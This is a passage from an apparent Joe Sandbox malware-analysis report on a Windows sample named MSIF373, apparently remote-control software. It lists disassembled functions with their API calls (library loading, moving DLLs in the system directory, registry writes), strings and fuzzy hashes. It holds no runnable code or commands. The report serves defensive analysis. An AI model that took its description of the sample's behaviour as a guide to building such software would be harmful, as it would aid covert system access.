                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountMetricsSystemTick$ReleaseVersion
                                                                                          • String ID: PCI GDIHOOK5
                                                                                          • API String ID: 1620108203-3323809677
                                                                                          • Opcode ID: 26588eebfaa7439479a0b0a3559dfab0b44ba94ba08255b53a6de03263d2313e
                                                                                          • Instruction ID: 4a52bae7a87b978580357e81e4e9549de3cd08b7a6965c86b4d4bb4dcc3aa7f5
                                                                                          • Opcode Fuzzy Hash: 26588eebfaa7439479a0b0a3559dfab0b44ba94ba08255b53a6de03263d2313e
                                                                                          • Instruction Fuzzy Hash: 6141B2B59003089FCF28DF65CD8AAEABBFDFF85305F0484ADE60A96141D6316A45CF61
                                                                                          Function 005CA0F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • Callstack:, xrefs: 005CA1E0
                                                                                          • %02X , xrefs: 005CA1C3
                                                                                          • EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%0, xrefs: 005CA17D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$CurrentReadThread
                                                                                          • String ID: Callstack:$%02X $EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%0
                                                                                          • API String ID: 477357799-1804337886
                                                                                          • Opcode ID: 0739e0cf0cbd132d6178898b8c08a57b426b80fe3094027067b2265f60e45506
                                                                                          • Instruction ID: d6d67690817a94ad1690d7c299b1dd82195634795fcfc83650a8cacf557daa8a
                                                                                          • Opcode Fuzzy Hash: 0739e0cf0cbd132d6178898b8c08a57b426b80fe3094027067b2265f60e45506
                                                                                          • Instruction Fuzzy Hash: 684120B6300606BFDB44CFA8DC94F96BBAABB88744F048218F91DC7255D730A914CBE1
                                                                                          Function 005C4660 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 91libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 005C46C6
                                                                                          • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 005C46D8
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005C4714
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005C4731
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$Free$AddressLoadProc
                                                                                          • String ID: ..\CTL32\util.cpp$DllGetVersion$pdwMajorVer$pdwMinorVer
                                                                                          • API String ID: 1386263645-850731426
                                                                                          • Opcode ID: 97fe1fe15c3bcc8634ee8bb03d0a91d63371a42d2bfa1195c88492ae793ab311
                                                                                          • Instruction ID: 797b73cd43bf2128e62808b94ed74525b0cbba34e2138d2472b9d2d775e8a648
                                                                                          • Opcode Fuzzy Hash: 97fe1fe15c3bcc8634ee8bb03d0a91d63371a42d2bfa1195c88492ae793ab311
                                                                                          • Instruction Fuzzy Hash: 6B318071E0420A9BCB049FA9E855BEEFBF5FF88715F14406EE909A3381DB7059008BD1
                                                                                          Function 005DEA04 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68sleepwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • PostMessageW.USER32(?,000003E1,?,00000000), ref: 005DEDE1
                                                                                          • DestroyWindow.USER32(?), ref: 005DEDEE
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005DEE58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$DestroyLocalMessagePostSleepTimeWindowwvsprintf
                                                                                          • String ID: Done:$Exit$OK$Restart$winexec.ok
                                                                                          • API String ID: 2273097643-2848714714
                                                                                          • Opcode ID: d7cbb7f2aaaf2246845a7e99de61c883f9da133cf5c15109bf940601236f32a2
                                                                                          • Instruction ID: abe49c41dee229a203cae5271667180ffb3d867748ff70b8902a264d254e371b
                                                                                          • Opcode Fuzzy Hash: d7cbb7f2aaaf2246845a7e99de61c883f9da133cf5c15109bf940601236f32a2
                                                                                          • Instruction Fuzzy Hash: 64112C75E405159BCB30BB68BC9BE6E3B66FB41305B084437F4479A342EA715980CBF2
                                                                                          Function 005CA5E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32 ref: 005CA600
                                                                                          • wsprintfW.USER32 ref: 005CA61A
                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 005CA630
                                                                                            • Part of subcall function 005C55B0: GetTickCount.KERNEL32 ref: 005C5618
                                                                                            • Part of subcall function 005CA0F0: GetCurrentThreadId.KERNEL32 ref: 005CA103
                                                                                            • Part of subcall function 005CA0F0: wsprintfW.USER32 ref: 005CA183
                                                                                            • Part of subcall function 005CA0F0: IsBadReadPtr.KERNEL32(?,00000001), ref: 005CA1A8
                                                                                            • Part of subcall function 005CA0F0: wsprintfW.USER32 ref: 005CA1C9
                                                                                            • Part of subcall function 005CA0F0: wsprintfW.USER32 ref: 005CA1E6
                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 005CA662
                                                                                          • SetLastError.KERNEL32(00000000), ref: 005CA665
                                                                                          • GetVersion.KERNEL32 ref: 005CA670
                                                                                          • ExitProcess.KERNEL32 ref: 005CA6B3
                                                                                            • Part of subcall function 005AFF40: GetModuleHandleW.KERNEL32(kernel32.dll,ProcessIdToSessionId,?,00000000), ref: 005AFF66
                                                                                            • Part of subcall function 005AFF40: GetProcAddress.KERNEL32(00000000), ref: 005AFF6D
                                                                                            • Part of subcall function 005AFF40: GetCurrentProcessId.KERNEL32(00000000), ref: 005AFF83
                                                                                            • Part of subcall function 005C59F0: SetEvent.KERNEL32(000001FC), ref: 005C5A0B
                                                                                          Strings
                                                                                          • Invalid CRT parameter. file=%s, line=%d, func=%s, Trying minidump., xrefs: 005CA614
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$CurrentDebugErrorLastOutputProcessString$AddressCountEventExitHandleModuleProcReadThreadTickVersion
                                                                                          • String ID: Invalid CRT parameter. file=%s, line=%d, func=%s, Trying minidump.
                                                                                          • API String ID: 465577698-2858110079
                                                                                          • Opcode ID: c60da59ebd4454bed2e491070f0e620963edbcc390d2136177e7068bf319c37c
                                                                                          • Instruction ID: 880cae884da12413ee12c1539a26702a9c0c582d391dbdaec2b04ff7cc8dbc50
                                                                                          • Opcode Fuzzy Hash: c60da59ebd4454bed2e491070f0e620963edbcc390d2136177e7068bf319c37c
                                                                                          • Instruction Fuzzy Hash: 6711E475D003197FDB10ABE48C4EFDA7B6DAF44704F448095B619A7193EA70AD40CBB1
                                                                                          Function 005AE750 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 37libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005AE5E0: LoadLibraryW.KERNEL32(USER32), ref: 005AE5F9
                                                                                          • GetDC.USER32(00000000), ref: 005AE75C
                                                                                          • LoadLibraryW.KERNEL32(USER32,\gdihook5.dll), ref: 005AE76E
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 005AE780
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005AE793
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005AE79C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$Load$AddressFreeProcRelease
                                                                                          • String ID: EnumDisplayMonitors$USER32$\gdihook5.dll
                                                                                          • API String ID: 959129003-2682909438
                                                                                          • Opcode ID: 905b8bd960ec3113c4db3a76fa0e64da1c64ead5d4e9b1d022f867cf1bb40f27
                                                                                          • Instruction ID: 5bed7259df7bbec63dc23936f496d86575e528298feecde32a2388f98ef4612d
                                                                                          • Opcode Fuzzy Hash: 905b8bd960ec3113c4db3a76fa0e64da1c64ead5d4e9b1d022f867cf1bb40f27
                                                                                          • Instruction Fuzzy Hash: B9F0E935A4121267CB119768BC9FFDE7B63EFC6F11F0C5101FA05922D1DB20840086E2
                                                                                          Function 005B8A59 Relevance: 13.6, APIs: 9, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Global$FreeUnlock$DeleteObject
                                                                                          • String ID:
                                                                                          • API String ID: 1228591530-0
                                                                                          • Opcode ID: c38a4971f899cfbe32ae9ddfd1716d56968c6063f2a16c2923aec928d7810dde
                                                                                          • Instruction ID: 46d6f97205234bf971fe7d47c656d1b610ad372035d26aec30038b2c17376375
                                                                                          • Opcode Fuzzy Hash: c38a4971f899cfbe32ae9ddfd1716d56968c6063f2a16c2923aec928d7810dde
                                                                                          • Instruction Fuzzy Hash: EC41A2B1D04299ABCF21DFA4C8909FEBFBABF59314F195589E84067202CB31BD41CB60
                                                                                          Function 005C6F10 Relevance: 13.6, APIs: 9, Instructions: 93windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 005C6F35
                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 005C6F4A
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005C6F4E
                                                                                          • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 005C6F64
                                                                                          • SendMessageW.USER32(?,00000148,00000000,?), ref: 005C6F9D
                                                                                          • GetTextExtentPoint32W.GDI32(00000000,?,?,?), ref: 005C6FCF
                                                                                          • SendMessageW.USER32(?,00000160,?,00000000), ref: 005C7018
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005C7022
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005C702B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessageSend$ObjectSelect$ExtentPoint32ReleaseText
                                                                                          • String ID:
                                                                                          • API String ID: 583237262-0
                                                                                          • Opcode ID: 118bc614a5c5fdcf1c358e6ad611e17e752ccfc70a4841a523df9be859602ee6
                                                                                          • Instruction ID: acc09b6f1b223fe182dda33844f5e6061ff1f1481dc70f72a51b0d2d5b0d4ab3
                                                                                          • Opcode Fuzzy Hash: 118bc614a5c5fdcf1c358e6ad611e17e752ccfc70a4841a523df9be859602ee6
                                                                                          • Instruction Fuzzy Hash: AE315071940219AFDB509F64DC85FEA77F9FF44700F04C199E649A7180DE709E858FA0
                                                                                          Function 005B6BB0 Relevance: 13.6, APIs: 9, Instructions: 70memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 005B6BB7
                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 005B6BEF
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005B6BFD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocGlobalRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1459782005-0
                                                                                          • Opcode ID: e04ee8e3b1fc60ef8e7b5367b492b7011fe9a785ae86eecdd62eecbb17b4ef8c
                                                                                          • Instruction ID: 8edb4cf0a07e6fbb09ba6cb598aa0a31587ec0026f67ba3178cf35b5bba5328f
                                                                                          • Opcode Fuzzy Hash: e04ee8e3b1fc60ef8e7b5367b492b7011fe9a785ae86eecdd62eecbb17b4ef8c
                                                                                          • Instruction Fuzzy Hash: 1E110A326002146BD7219BA8BC59BEB7BBDFB49722F048167FE09C3250DA755D0087F1
                                                                                          Function 005AC180 Relevance: 13.6, APIs: 9, Instructions: 63fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • UnmapViewOfFile.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC18F
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1A9
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1B6
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1C3
                                                                                          • SetEvent.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1D5
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1DF
                                                                                          • SetEvent.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1F1
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC1FB
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,005ACAC6), ref: 005AC208
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$Event$FileUnmapView
                                                                                          • String ID:
                                                                                          • API String ID: 2427653990-0
                                                                                          • Opcode ID: 801725e7c2eee994ad0a08f9524e5f39a43db4d09996c07795515cb6f9ce6053
                                                                                          • Instruction ID: 2b04a68c99f4e384ea4c9ca60c799974aa26715b0bed801ab3ae091cf6b8b20c
                                                                                          • Opcode Fuzzy Hash: 801725e7c2eee994ad0a08f9524e5f39a43db4d09996c07795515cb6f9ce6053
                                                                                          • Instruction Fuzzy Hash: 5B11E9B1A00B409FC7309FAA98C485AFFF9BE593103544E2EE196C3A51C630E848CE60
                                                                                          Function 0059AB90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$Close
                                                                                          • String ID: %s.Services
                                                                                          • API String ID: 2117561858-610773381
                                                                                          • Opcode ID: 4ccc667f50153388b9d7a95cc8c87292fb96eeb2aee0c5b45e73188993f952b6
                                                                                          • Instruction ID: ba9a257d3a8eacf5c8663d7b91ba70e00e993921b476510d61cafe8beccff9b4
                                                                                          • Opcode Fuzzy Hash: 4ccc667f50153388b9d7a95cc8c87292fb96eeb2aee0c5b45e73188993f952b6
                                                                                          • Instruction Fuzzy Hash: 1B5171B1A00214AFDB14DB64EC59FAA77BAFF88711F004559F90AC7281DA759D40CFE2
                                                                                          Function 005D2E70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 151COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,000000F2), ref: 005D2E94
                                                                                          • MoveFileExW.KERNEL32(?,?,00000000), ref: 005D2FB6
                                                                                          • MoveFileExW.KERNEL32(?,?,00000001), ref: 005D2FE0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileMove$DirectorySystem
                                                                                          • String ID: .dll$.old$.org
                                                                                          • API String ID: 2645207662-1297993771
                                                                                          • Opcode ID: 433ef5d40f7268c7af3b66c585fe2f35dd0048378e9a4dcafe280862a3828e2e
                                                                                          • Instruction ID: 709ec7b2f46c6b5dfe597e7dd6e9271358e4f1f5f0d360a206d29b4a802a93be
                                                                                          • Opcode Fuzzy Hash: 433ef5d40f7268c7af3b66c585fe2f35dd0048378e9a4dcafe280862a3828e2e
                                                                                          • Instruction Fuzzy Hash: AD51DE7590020A8BCB20DF6CC956BE6B7B6FF98340F058496EE56CB365E3709E41CB90
                                                                                          Function 005EF21F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,006428CA,00000104,00000001,?,00000000), ref: 005EF2BB
                                                                                          • GetStdHandle.KERNEL32(000000F4,00000001,?,00000000), ref: 005EF36D
                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 005EF3B9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$HandleModuleNameWrite
                                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                          • API String ID: 3784150691-4022980321
                                                                                          • Opcode ID: c0bd0d79cac36ca403e0542817f0b51b52dbea07770f18dd7a41743f436b3abd
                                                                                          • Instruction ID: 13e8133b04fcdcb8d0de061ee0094218ca9b1ab517b6b41b84a536629a48f007
                                                                                          • Opcode Fuzzy Hash: c0bd0d79cac36ca403e0542817f0b51b52dbea07770f18dd7a41743f436b3abd
                                                                                          • Instruction Fuzzy Hash: 9D41BB769406AB3BDB19663A5C4AEFF3F9DBB89304F140031FE84D2181EF248D4087A2
                                                                                          Function 005989F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005B97D0: wsprintfW.USER32 ref: 005B9804
                                                                                          • InitializeCriticalSection.KERNEL32(0000000C), ref: 00598A70
                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,00000000,0061A054,00000000,0002001F,00000000,00000008,?,?,00000001,00000001), ref: 00598AD5
